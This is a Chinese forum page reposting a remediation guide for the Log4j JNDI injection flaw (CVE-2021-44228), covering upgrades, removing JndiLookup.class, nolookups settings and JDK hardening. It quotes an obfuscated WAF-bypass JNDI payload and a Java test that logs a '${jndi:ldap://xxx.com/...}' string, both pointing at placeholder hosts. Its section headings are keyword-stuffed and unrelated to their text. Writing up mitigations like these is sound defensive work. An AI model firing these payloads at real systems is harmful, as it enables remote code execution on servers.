CXYVIP官网源码交易平台_网站源码_商城源码_小程序源码平台-丞旭猿论坛
CXYVIP官网源码交易平台_网站源码_商城源码_小程序源码平台-丞旭猿论坛
CXYVIP官网源码交易平台_网站源码_商城源码_小程序源码平台-丞旭猿论坛

log4j严重漏洞(快来看)log4J,Log4j 严重漏洞修最新修复方案参考,

1.log4j报错

CVE-2021-44228,原理上是 log4j-core 代码中的 JNDI 注入漏洞这个漏洞可以直接导致服务器被入侵,而且由于“日志”场景的特性,攻击数据可以多层传导,甚至可以威胁到纯内网的服务器。

2.log4j debug

log4j 作为 Java 开发的基础公共日志类,使用范围非常广,漏洞必定影响深远,想想当年commons-collections反序列化漏洞的影响范围Github漏洞公告:https://github.com/advisories/GHSA-jfh8-c2jp-5v3q

3.log4j反序列化漏洞代码

影响 < 2.15.0 的所有 2.x 版本也就是说,除了最新版本之外的所有版本都受影响最直接、有效、稳定的修复方式是:将 log4j-core 升级到 2.15.0 版本最直接、有效、稳定的修复方式是:将 log4j-core 升级到 2.15.0 版本。

4.log4j多线程漏写日志

最直接、有效、稳定的修复方式是:将 log4j-core 升级到 2.15.0 版本如果实在无法升级,可以尝试把漏洞类删掉其他修复方式可以结合使用起到比较好的快速缓解作用,但受限于不同的环境,可能会产生各种各样比较麻烦的问题或者未来的隐患。

5.log4j不存在

长期修复方案需要保证稳定、可靠、持久有效,这种严重漏洞值得一个发布和重启2.15.0 版本下载地址:https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/

pom.xml 配置org.apache.logging.log4jlog4j-core<

version>2.15.0缓解方式1:接入安全产品第一时间上WAF规则、RASP拦截等措施,给修复争取时间但是也要注意一些静态规则上的绕过,log4j 支持的写法比较多,有非常多绕过姿势。

比如:${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc} 缓解方式2:删除漏洞类通过删除漏洞类进行修复的方案比较稳,也是官方推荐的一种修复方案。

直接删除 log4j jar 包中存在漏洞的类:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

这种修复比较方便快捷,一般业务代码也不会用到 jndi lookup 这个功能不过可能会对基于版本号判定的安全数据采集造成一定困扰,无法准确统计漏洞的最新受影响情况建议删除之后在 jar 包后面加上一定的标记,如: log4j-2.14.1.sec.jar。

另外,由于某些原因不想删除的话,可以自己代码替换原始的 JndiLookup 类,将它加到业务代码中需要注意的是,必须保证它在 log4j 原类之前加载package org.apache.logging.log4j.core.lookup; 。

publicclassJndiLookup{ publicJndiLookup(){ thrownew NoClassDefFoundError(“JNDI lookup is disabled”

); } } 也可以做成依赖包,在 log4j-core 之前添加,可以实现同样的效果(注意不要引入不可信的第三方依赖,可能导致潜在安全风险,以下配置来源互联网,仅作为示例,请勿直接使用):

>org.glavolog4j-patch1.0当然也可以通过RASP的方式干掉漏洞类,Github上有不少RASP的无损修复方案,比如:

https://github.com/chaitin/log4j2-vaccinehttps://github.com/boundaryx/cloudrasp-log4j2缓解方式3:通过配置禁用 log4j 的 lookup 功能

禁用的方式就比较多了然而下面2、3、4这几种方式对低于 2.10 版本的 log4j-core 都没有效果,而且环境变量和启动参数这种设置,在迁移或者变更的过程中丢失的可能性比较大log4j 在 2.15.0 版本中默认就已经关闭了 lookup 功能。

log4j2.component.properties、log4j2.xml 默认放在 ClassPath 路径下,如:源代码的资源目录或者可执行程序所在的当前目录1. 设置日志输出 Pattern 格式。

对于 >=2.7 的版本,在 log4j 中对每一个日志输出格式进行修改在 %msg 占位符后面添加 {nolookups},这种方式的适用范围比其他三种配置更广比如在 log4j2.xml 中配置:

=”%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} – %msg{nolookups}%n”/>

level=”error”>publicclassTest {publicstatic

voidmain(String[] args){ String t = “${jndi:ldap://xxx.com/xxx}”; Logger logger = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME); logger.error(t); } }

2. 设置JVM系统属性在 Java 应用启动参数中增加 -Dlog4j2.formatMsgNoLookups=true,或者在业务代码中设置系统属性:// 必须在 log4j 实例化之前设置该系统属性

System.setProperty(“log4j2.formatMsgNoLookups”, “true”); Logger logger = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME);

3. 修改配置文件在配置文件 log4j2.component.properties 中增加:log4j2.formatMsgNoLookups=true,配置文件放置于应用程序的 ClassPath 路径下。

4. 设置进程环境变量在环境变量中增加:LOG4J_FORMAT_MSG_NO_LOOKUPS=true注意!这些配置和属性,并不能在所有场景下生效,比如在 logstash 中就无法生效: Solutions and Mitigations:

The widespread flag -Dlog4j2.formatMsgNoLookups=true does NOT mitigate the vulnerability in Logstash, as Logstash uses Log4j in a way where the flag has no effect. It is therefore necessary to remove the JndiLookup class from the log4j2 core jar, with the following command:

zip -q -d /logstash-core/lib/jars/log4j-core-2.* org/apache/logging/log4j/core/lookup/JndiLookup.class

Refer: https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476

缓解方式4:升级JDK版本对于Oracle JDK 11.0.1、8u191、7u201、6u211或者更高版本的JDK来说,默认就已经禁用了 RMI Reference、LDAP Reference 的远程加载。

对于 RCE 来说,可以起到很直接的缓解作用,可以作为增强型的加固方案在高版本JDK环境下,JNDI注入也还是存在一定RCE风险,可以参考这篇文章:https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html

另外 log4j 漏洞本身除了 RCE,还存在着巨大的攻击面,比如 SSRF、敏感信息泄露等等,威胁非常大,不要企图仅仅通过升级JDK版本来修复漏洞,建议还是老老实实升级原文链接:https://kingx.me/Patch-log4j.html。

如果这篇文章对你有帮助麻烦点赞关注一下

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
相关推荐
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容